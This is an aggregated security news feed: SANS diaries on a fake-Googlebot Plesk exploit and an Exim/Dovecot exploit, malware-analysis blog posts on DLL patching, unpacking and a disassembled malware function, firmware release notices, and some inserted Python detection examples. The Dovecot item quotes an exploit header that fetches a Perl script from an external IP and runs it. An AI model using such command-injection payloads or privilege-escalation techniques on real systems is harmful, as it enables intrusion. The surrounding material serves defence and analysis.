http://isc.sans.org/rssfeed_full.xml Like many other exploit scripts, the recent "Plesk" exploit used a fake user agent of "Googlebot". Attackers assume that most web applications are happy to be indexed by Google and possibly apply no or less stringent filters. For example, some applications will show more content to Google that is not readily displayed to normal users unless these users sign up, solve a captcha or even pay. Google however makes it pretty easy to distinguish "real" Google bots from fake ones. The IP address used by Google will reverse resolve to crawl-a-b-c-d.googlebot.com, where a-b-c-d is the IP address of the bot. In addition, this host name will resolve to the IP address used. In order to validate if a google bot is "real", the lookup against .googlebot.com is required. An attacker could fake the reverse lookup if the attacker can provide reverse DNS for the IP address used by the attacker. Personally, I use a little shell script to extract "fake google" spiders from my logs:

    #!/bin/sh
    # you may need to adjust the "cut" parameter and file name to match your own log format.
    for b in `grep 'Googlebot' /var/log/httpd/*access_log | cut -f 2 -d' ' | sort -u`; do
      # reverse lookup of the client address
      h=`host $b`
      if echo $h | grep -e ' crawl-.*\.googlebot\.com\.$'; then
        # forward lookup of the returned name must point back to the same address
        h=`echo $h | cut -f5 -d' '`
        n=`host $h | cut -f4 -d' '`
        if [ "$n" = "$b" ] ; then
          echo ok $n $h $b
        else
          echo fake $b;
        fi
      else
        echo fake $b;
      fi
    done

-- Johannes B. Ullrich, Ph.D. SANS Technology Institute Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Monday, June 10th 2013 http://isc.sans.edu/podcastdetail.html?id=3356, (Mon, Jun 10th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Exim/Dovecot exploit making the rounds, (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration. We'd caution anyone that is using Dovecot to take a look at their configuration and make sure they aren't using the "use_shell" parameter. Or if you are, make darn sure you know what you are doing, and how to defend yourself. -- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> 100% Compliant (for 65% of the systems), (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml At a community college where I'm helping out whenever they panic on security issues, I recently was confronted with the odd reality of a lingering malware infection on their network, even though they had deployed a custom anti-virus (AV) pattern ("extra.dat") to eradicate the problem. Of course, these days, reliance on anti-virus is somewhat moot to begin with: our recent tally of fresh samples submitted to VirusTotal had AV lagging behind about 8 days or so. If you caught a keylogger spyware, 8 days is plenty to wreak havoc. I usually compare today's AV to the coroner in CSI: he can probably tell what killed you, but won't keep you alive. But back to the college. Turns out they verify on a weekly basis if all the PCs have a current pattern, and they also verified that all their PCs got the "extra" pattern. The only problem was, their definition of "all" relied on the AV tool itself. Obviously, if a PC doesn't have anti-virus installed, it won't show up on the anti-virus console. Hence, if your AV claims you have 100% compliance, you might want to check an alternate repository, like for example your Active Directory, to compare numbers. When I ran this test at the college, I found that their network/AD had 51 more workstations than their AV knew about. No wonder they still had frequent hits on the IDS for the backdoor traffic. Never rely on a single security tool to tell you that everything is fine. Throw two or more sets of data against each other, and investigate discrepancies. Like your fishing or drinking or training buddy, security tools lie. Get acquainted with the usual pattern of lies (or obfuscated truths :), and surprises and disappointments will become less frequent.

==> ISC StormCast for Friday, June 7th 2013 http://isc.sans.edu/podcastdetail.html?id=3353, (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml

==> PHP patches - see http://www.php.net/ChangeLog-5.php - fixes CVE2013-2110, (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml

==> Plesk 0-day: Real or not?, (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml Yesterday, a poster to the full disclosure mailing list described a possible new 0-day vulnerability against Plesk. Contributing to the vulnerability is a very odd configuration choice to expose "/usr/bin" via a ScriptAlias, making executables inside the directory reachable via URLs. The big question that hasn't been answered so far is how common this configuration choice is. Apparently, some versions of Plesk on CentOS 5 are configured this way, but not necessarily exploitable. The exploit is pretty easy to spot. It sends a heavily URL encoded POST request with a "Googlebot" user agent. Google typically doesn't send POST requests, so they are pretty easy to spot. I found a couple POSTs from "Google" (actually a "random" Chinese IP address, 222.187.222.122 ) in our web logs here. Masquerading as Google is a common trick among exploit scripts. Please verify that your Apache configuration does NOT include this line:

    ScriptAlias /phppath/ "/usr/bin/"

Let us know if you spot it in the wild. -- Johannes B. Ullrich, Ph.D. SANS Technology Institute Twitter
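The two checks from the diary above, written out as an added example (not part of the original diary): scan Apache configuration text for a ScriptAlias that maps a URL prefix onto a system binary directory, and flag access-log lines that pair a "Googlebot" user agent with a POST request. The configuration fragment, the log lines (documentation-range addresses), the extra directory names and all function names are constructed for illustration, and the log parser assumes the Apache "combined" format.

```python
import re

# /usr/bin is the directory named in the diary; the other entries are an
# assumption about what else an administrator would want flagged.
SYSTEM_BIN_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin"}

SCRIPTALIAS_RE = re.compile(
    r'^\s*ScriptAlias(?:Match)?\s+(\S+)\s+"?([^"\s]+)"?', re.IGNORECASE)

# Apache "combined" log format (assumed; adjust for a custom LogFormat).
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

PCT_RE = re.compile(r"%[0-9A-Fa-f]{2}")


def risky_script_aliases(config_text):
    """Return (line number, URL prefix, target) for each active ScriptAlias
    whose target is a system binary directory."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        if line.lstrip().startswith("#"):      # commented-out directive
            continue
        m = SCRIPTALIAS_RE.match(line)
        if not m:
            continue
        url_prefix, target = m.group(1), m.group(2)
        normalized = target.rstrip("/") or "/"
        if normalized in SYSTEM_BIN_DIRS:
            findings.append((lineno, url_prefix, target))
    return findings


def googlebot_posts(log_lines):
    """Return one record per POST request that claims a Googlebot user agent.

    encoded_ratio is the share of the request path made up of %XX escapes;
    the diary describes the exploit request as heavily URL encoded.
    """
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        if m.group("method") != "POST":
            continue
        if "googlebot" not in m.group("ua").lower():
            continue
        path = m.group("path")
        ratio = 3 * len(PCT_RE.findall(path)) / len(path)
        hits.append({"ip": m.group("ip"), "path": path,
                     "status": int(m.group("status")),
                     "encoded_ratio": round(ratio, 2)})
    return hits


# Constructed httpd.conf fragment.
SAMPLE_CONFIG = """\
# constructed example
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
ScriptAlias /phppath/ "/usr/bin/"
#ScriptAlias /old/ "/usr/sbin/"
"""

# Constructed access-log lines; the encoded path decodes to "/example/path".
GOOGLE_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jun/2013:10:01:02 +0000] '
    '"POST /%65%78%61%6d%70%6c%65/%70%61%74%68 HTTP/1.1" 404 312 "-" "'
    + GOOGLE_UA + '"',
    '198.51.100.7 - - [07/Jun/2013:10:02:11 +0000] '
    '"GET /index.html HTTP/1.1" 200 5120 "-" "' + GOOGLE_UA + '"',
    '203.0.113.5 - - [07/Jun/2013:10:03:40 +0000] '
    '"POST /login HTTP/1.1" 302 0 "http://www.example.com/" '
    '"Mozilla/5.0 (Windows NT 6.1)"',
]

if __name__ == "__main__":
    for lineno, prefix, target in risky_script_aliases(SAMPLE_CONFIG):
        print("config line %d: %s -> %s" % (lineno, prefix, target))
    for hit in googlebot_posts(SAMPLE_LOG):
        print("POST with Googlebot UA:", hit)
```

A POST carrying a Googlebot user agent is a triage signal only; the reverse and forward DNS lookup is what settles whether the client address belongs to Google.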

==> Google Chrome has been updated to version 27.0.1453.110, (Thu, Jun 6th)

http://isc.sans.org/rssfeed_full.xml

==> Elevation of Privilege DLL Patcher

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability but I need to create a proof-of-concept to show the feasibility of the vulnerability's exploitability. Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writeable by an unprivileged attacker. An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user. Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own. The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched in code relies on the function NetLocalGroupAddMembers(...) from netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse side effect of this is that this may cause the DLL to take a few extra milliseconds to load. The patcher is compatible with both 32-bit and 64-bit DLLs. 
You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you

==> Counting Lines of Source Code

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I'm reviewing the source code for a rather large project this week and I wanted to update my Facebook status by saying something like, "Jason is reviewing 100,000 lines of Java for security vulnerabilities." However, being the perfectionist that I am I wanted to give the real number of lines of code. I wasn't aware of any built-in functionality in Visual Studio to do this, and after three minutes of Googling, I found a lot of Visual Studio plugins that could do this but unfortunately I didn't find any instructions on how to do this with just plain Visual Studio. And honestly, I didn't want to install a plugin (see http://blogs.msdn.com/oldnewthing/archive/2006/03/22/558007.aspx :) I figured I could whip up a short C# program to do this, but even that seemed a little over-kill for such a simple task. Then I realized I could do this from a standard console window command prompt:

    cmd /v:on
    set lines=0
    for /r %a in (*.java) do (
    find /v /c "" "%a" > %temp%\temp.txt
    for /f "tokens=6" %b in (%temp%\temp.txt) do (set /a lines += %b))
    echo %lines%

The "tokens=6" part is specific to the source code directory structure for this particular project, and if any of the source code subdirectories contained spaces, you'd have to tweak the code above a little. But hey, it worked out quite nicely, and it was a much cleaner solution than installing a plugin. And I'm sure there's an even shorter/simpler way to do this from a standard command prompt than with what I have above. Feel free to post cleaner "solutions" :) (BTW, the actual number of lines turned out to be 348,523... that should keep me busy for a while.)

==> Investigating Outlook's Single-Instance Restriction (PART 2)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Please see PART 1. While the return value of FindWindowA is used to determine whether or not Outlook terminates its process, there's another issue when it comes to using a separate profile. Outlook calls MAPILogonEx without the MAPI_NEW_SESSION bit set. This causes Outlook to try to use an existing MAPI session if it can find one. Because of this, Outlook doesn't present the user with the option to choose a different profile in the second instance of Outlook; it will instead just use the profile that the first instance is using. (Why I didn't hit this issue in PART 1 is not clear.) As such, to fully overcome Outlook's single-instance limitation, it is necessary to spoof the return value of the FindWindowA call in PART 1 and to set the MAPI_NEW_SESSION bit in the flFlags argument passed to MAPILogonEx.

==> Loading Drivers in OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In a previous post, I talked about changing the Subsystem field in the IMAGE_OPTIONAL_HEADER to trick OllyDbg into loading a driver for the purpose of unpacking. However, making this single change is often not enough to be able to load the driver as an EXE in OllyDbg. From my experience (in other words, I haven't verified this in the Windows source code and I'm not speaking authoritatively here), executable files need to have NTDLL.DLL in their Import Table or have another DLL in their Import Table that will eventually cause NTDLL.DLL to get loaded. I was looking at a driver today that only had NTOSKRNL.EXE and HAL.DLL in its Import Table. The former causes BOOTVID.DLL and KDCOM.DLL to get loaded as well, however nowhere in the import chain does NTDLL.DLL get loaded. Because of this, OllyDbg can't get the driver up and running after we make the Subsystem change. To solve this problem, we can add NTDLL.DLL (or anything that imports NTDLL.DLL, like KERNEL32.DLL) to the Import Table of the driver and OllyDbg will then be able to load the driver as a new process.

==> Function Analysis

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it's still unclear as to what the function does. Since you don't have access to the callers of this function, I'll tell you this:

* The first argument is a null-terminated ASCII string.
* The second argument is a null-terminated ASCII string.
* The third argument is an integer.

Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations:

* Cannot refer to the name of a person, place, or time.
* Cannot refer to anything obscene or offensive.
* Cannot be found in a dictionary or web-search.
* Cannot use bleep-casing for compounding words -- must begin with one uppercase letter and end with all lowercase letters.
* Must be a "generic" name (for example, shouldn't contain the word "bot" or "worm", since I have no idea what class of malware I'll end up naming next).
* Must be humanly pronounceable.
* Must be between four and eight letters in length.
* I have final discretion over the name in case you think of something "bad" that isn't covered by one of the rules above.

The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does. And in case you think I'm "hiring cheap labor" to analyze this for me, I'll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I'll post my analysis which hashes to that MD5.
Here's the function:

    sub_0 proc near

    var_10 = dword ptr -10h
    var_C  = dword ptr -0Ch
    var_8  = dword ptr -8
    var_4  = dword ptr -4
    arg_0  = dword ptr  8
    arg_4  = dword ptr  0Ch
    arg_8  = dword ptr  10h

            push    ebp
            mov     ebp, esp
            sub     esp, 10h
            push    ebx
            push    esi
            push    edi
            mov     esi, [ebp+arg_4]
            mov     [ebp+var_8], 697A259Dh
            xor     [ebp+var_8], 182Ch
            inc     dword ptr ds:42C094h
            and     [ebp+var_C], 0
            and     [ebp+var_4], 0
            jmp     short loc_94
    ; -----------------------------------------------------------------------
    loc_2A:                                 ; CODE XREF: sub_0+A6j
            xor     ebx, ebx
            add     [ebp+var_8], 3AA5h
            inc     dword ptr ds:42C094h
            xor     edi, edi
            jmp     short loc_81
    ; -----------------------------------------------------------------------
    loc_3D:                                 ; CODE XREF: sub_0+8Fj
            mov     eax, [ebp+var_4]
            add     eax, edi
            mov     edx, [ebp+arg_0]
            movsx   eax, byte ptr [edx+eax]
            movsx   edx, byte ptr [esi+edi]
            cmp     eax, edx
            jnz     short loc_52
            inc     ebx
    loc_52:                                 ; CODE XREF: sub_0+4Fj
            mov     ecx, esi
            or      eax, 0FFFFFFFFh
    loc_57:                                 ; CODE XREF: sub_0+5Cj
            inc     eax
            cmp     byte ptr [ecx+eax], 0
            jnz     short loc_57
            cmp     ebx, eax
            jnz     short loc_72
            inc     [ebp+var_C]
            mov     eax, [ebp+arg_8]
            cmp     [ebp+var_C], eax
            jnz     short loc_72
            mov     eax, [ebp+var_4]
            jmp     short loc_C0
    ; -----------------------------------------------------------------------
    loc_72:                                 ; CODE XREF: sub_0+60j
                                            ; sub_0+6Bj
            mov     eax, 43C9h
            mul     [ebp+var_8]
            mov     [ebp+var_10], eax
            mov     [ebp+var_8], eax
            inc     edi
    loc_81:                                 ; CODE XREF: sub_0+3Bj
            mov     ecx, esi
            or      eax, 0FFFFFFFFh
    loc_86:                                 ; CODE XREF: sub_0+8Bj
            inc     eax
            cmp     byte ptr [ecx+eax], 0
            jnz     short loc_86
            cmp     edi, eax
            jb      short loc_3D
            inc     [ebp+var_4]
    loc_94:                                 ; CODE XREF: sub_0+28j
            mov     eax, [ebp+arg_0]
            mov     ecx, eax
            or      eax, 0FFFFFFFFh
    loc_9C:                                 ; CODE XREF: sub_0+A1j
            inc     eax
            cmp     byte ptr [ecx+eax], 0
            jnz     short loc_9C
            cmp     [ebp+var_4], eax
            jb      short loc_2A
            mov     eax, 0FFFFh
            jmp     short loc_C0
    ; -----------------------------------------------------------------------
            mov     eax, 514Ah
            mul     dword ptr [ebp-8]
            mov     [ebp-10h], eax
            mov     eax, [ebp-10h]
            mov     [ebp-8], eax
    loc_C0:                                 ; CODE XREF: sub_0+70j
                                            ; sub_0+ADj
            pop     edi
            pop     esi
            pop     ebx
            leave
            retn
    sub_0 endp

And here's the raw byte-code for the function above:

    5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200
    8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC
    01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3
    7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8
    4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01
    0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8
    5F5E5BC9C3

==> Virus Bulletin 2006

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I bought my plane ticket a few hours ago for Virus Bulletin 2006. I'm looking forward to rubbing elbows with other virus analysts and discussing the latest and greatest reverse engineering tools and methods. If you're going to VB'06 as well, send me an e-mail or find me in person and mention my blog and I'll buy you a beer (which shouldn't be too hard seeing as how the conference will be in Montreal)!

==> Unpacking DLLs and Drivers with OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx People often ask me how to unpack DLLs and drivers. A common assumption is that it is necessary to use OllyDbg's LOADDLL for unpacking DLLs and that a ring-0 debugger such as SoftICE or WinDbg is necessary for unpacking drivers. With a little tweaking, we can use regular OllyDbg to unpack packed DLLs and even many packed drivers. I don't know about you, but I've always had problems with LOADDLL. Even though it's well documented in OllyDbg's help file (the source is even included in the help file), I'd rather not use it if I don't have to. So how can we load a DLL into OllyDbg so that we can unpack it like we would a normal EXE? All that you need to do is set the IMAGE_FILE_DLL bit to zero in the Characteristics field of the PE's IMAGE_FILE_HEADER structure. You could use a hex editor to make this change, but it's easier with a PE editor like LordPE. Once this flag is zeroed out, you can load the "DLL" into OllyDbg and OllyDbg and the OS will interpret it as an EXE. You can then unpack it as you would an EXE (trace to the OEP, dump, fix the imports, etc.), and then set the IMAGE_FILE_DLL bit back to one in the unpacked file. The only catch is that many unpacking stubs check to see if [EBP+0x0C] == 1 (does the fdwReason argument to DllMain equal DLL_PROCESS_ATTACH), and if it doesn't equal 1 then it won't continue to unpack itself. You can fix this problem by looking for this comparison and forcing a jump/no-jump or by manually pushing three DWORDs onto the stack (before executing the first instruction at the EP), the second of which should be 1. We can use the same PE header patching trick for loading drivers into OllyDbg for unpacking purposes. By setting the Subsystem field to 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI) in the PE's IMAGE_OPTIONAL_HEADER, OllyDbg and the OS will interpret the file as an EXE instead of as a driver. 
This allows us to trace through the unpacking stub until the code and data are unpacked, and we can dump the process when we find the OEP. Of course if the unpacking stub is trying to execute instructions/functions that need to be executed from ring-0 then we won't be able to unpack it like this. However, if the unpacking stub is just doing a lot of simple XORing to unpack the original code and data, then we should be able to use this trick to successfully unpack the driver with OllyDbg.
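The two header fields this post patches, located and rewritten in Python as an added example (not the author's tool and not part of the original post): the IMAGE_FILE_DLL bit in the Characteristics field and the Subsystem field of the optional header. The miniature header produced by `build_sample_header` is constructed for the demonstration and is not a loadable image, and all function names are illustrative.

```python
import struct

IMAGE_FILE_DLL = 0x2000
IMAGE_SUBSYSTEM_NATIVE = 1
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def _field_offsets(image):
    """Return file offsets of (Characteristics, Subsystem) after validating
    the DOS and PE signatures."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    file_header = e_lfanew + 4           # IMAGE_FILE_HEADER follows "PE\0\0"
    optional = file_header + 20          # IMAGE_FILE_HEADER is 20 bytes
    if len(image) < optional + 70:       # Subsystem occupies bytes 68..69
        raise ValueError("file too short for a PE optional header")
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (magic,) = struct.unpack_from("<H", image, optional)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%X" % magic)
    # Subsystem sits at offset 68 in both the PE32 and PE32+ layouts.
    return file_header + 18, optional + 68


def read_flags(image):
    """Report whether the DLL bit is set and which subsystem is declared."""
    chars_off, subsys_off = _field_offsets(image)
    (chars,) = struct.unpack_from("<H", image, chars_off)
    (subsys,) = struct.unpack_from("<H", image, subsys_off)
    return {"is_dll": bool(chars & IMAGE_FILE_DLL), "subsystem": subsys}


def patch_for_user_mode_load(image):
    """Return (patched copy, original field values).

    Clears IMAGE_FILE_DLL and, for a native-subsystem file (a driver),
    sets Subsystem to IMAGE_SUBSYSTEM_WINDOWS_GUI. The input is not modified.
    """
    chars_off, subsys_off = _field_offsets(image)
    patched = bytearray(image)
    (chars,) = struct.unpack_from("<H", patched, chars_off)
    (subsys,) = struct.unpack_from("<H", patched, subsys_off)
    struct.pack_into("<H", patched, chars_off, chars & ~IMAGE_FILE_DLL)
    if subsys == IMAGE_SUBSYSTEM_NATIVE:
        struct.pack_into("<H", patched, subsys_off,
                         IMAGE_SUBSYSTEM_WINDOWS_GUI)
    return bytes(patched), (chars, subsys)


def restore_header(image, original):
    """Write the saved Characteristics and Subsystem values back, as the
    post does for the unpacked file."""
    chars_off, subsys_off = _field_offsets(image)
    restored = bytearray(image)
    struct.pack_into("<H", restored, chars_off, original[0])
    struct.pack_into("<H", restored, subsys_off, original[1])
    return bytes(restored)


def build_sample_header(characteristics, subsystem, magic=PE32_MAGIC):
    """Constructed minimal DOS + PE headers, just enough for the parser."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0,
                              characteristics)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, magic)
    struct.pack_into("<H", optional, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + file_header + bytes(optional)


if __name__ == "__main__":
    dll = build_sample_header(0x2102, IMAGE_SUBSYSTEM_WINDOWS_GUI)
    patched, saved = patch_for_user_mode_load(dll)
    print(read_flags(dll), "->", read_flags(patched))
    print("restored equals original:", restore_header(patched, saved) == dll)
```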

==> FortiCache 2.3.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.3.0 B0273 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC, * FCHV64

==> FortiClient Mac 5.0.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.4 B0116 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MacOS

==> FortiClient 5.0.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.4 B0276 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiDB 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiDB 5.0.0 B0002 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDB_400B, FDB_1000B, FDB_1000C, * FDB_2000B, FDB_Stand-alone

==> FortiAP 5.0.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.4 B0039 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B, FAP_11C, FAP_14C, * FAP_28C

==> FortiOS 5.0.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.3 B0208 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_40C, FGT_60C, FGT_80C, * FGT_80CM, FGT_110C, FGT_111C, * FGT_200B, FGT_200B_POE, FGT_300C, * FGT_310B, FGT_311B, FGT_620B, * FGT_620B_DC, FGT_621B, FGT_1240B, * FGT_3016B, FGT_3040B, FGT_3140B, * FGT_3810A, FGT_3950B, FGT_3951B, * FGT_5001A, FGT_5001B, FGT_VM32, * FGT_VM64, FWF_40C, FWF_60C, * FWF_60CM, FWF_60CX_A, FWF_80CM, * FWF_81CM, FGT_310B_DC, FGT_3040B_DC, * FGT_3040B_LENC, FGT_3140B_LENC, FGT_3140B_DC, * FGT_800C, FGT_1000C, FGT_100D, * FGT_5101C, FGT_600C, FSW_5203B, * FWF_20C, FGT_20C, FGT_60C_POE, * FGT_20C_ADSL_A, FWF_20C_ADSL_A, FGT_60D, * FWF_60D, FGT_3240C, FGT_3600C, * FGT_5001C, FGT_VM64_XEN

==> FortiVoice 7.3.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.3.0 B003 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiAnalyzer 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 5.0.2 B0151 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAZ_300D

==> FortiManager 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 5.0.2 B0151 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FMG_300D

==> FortiDDoS 3.2.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.2.1 B108 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDD_100A, FDD_200A, FDD_300A,

==> FortiAuthenticator 2.2.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiAuthenticator 2.2.1 B0208 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAC_200D, FAC_400C, FAC_1000C, * FAC_3000B, FAC_VM

==> FortiMail 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 5.0.1 B0123 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FE_100C, FE_2000A, FE_2000B, * FE_200D, FE_3000C, FE_3000D, * FE_4000, FE_400B, FE_400C, * FE_5001A, FE_5002B, FE_VM,

==> FortiWeb 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 5.0.0 B0009 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_3000D, FWB_3000DFSX, FWB_4000C, * FWB_4000D, FWB_VM-64bit

==> FortiOS 4.3.14

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.14 B0665 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FWF_60C, * FOC_3950B, FOC_3951B, FGT_3040B, * FGT_621B, FGT_3140B, FGT_5001B, * FGT_60C, FGT_VM32, FK_3810A, * FK_5001A, FK_3950B, FK_3951B, * FSW_5203B, FWF_60CX_A, FWF_60CM, * FGT_300C, FOC_80C, FOC_5001B, * FK_5001B, FGT_VM64, FGT_600C, * FGT_1000C, FGT_40C, FWF_40C, * FGT_20C, FWF_20C, FGT_VM64_XEN, * FGT_100D, FGT_3240C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C, FGT_60C_POE, FGT_20C_ADSL_A, * FWF_20C_ADSL_A

==> FortiCache 2.2.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.2.2 B0226 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCHV64

==> FortiADC 2.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiADC 2.1.0 B0056 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAD_VM

==> FortiDDoS 3.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.2.0 B107 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDD_100A, FDD_200A, FDD_300A,

==> FortiSwitchOS 2.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitchOS 2.0.1 B0007 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FSW_324B_POE, FSW_348B, FSW_448B,

==> FortiDNS 1.2.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiDNS 1.2.1 B0121 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FNS_400C, FNS_1000C, FNS_VM,

==> FortiOS 4.3.13

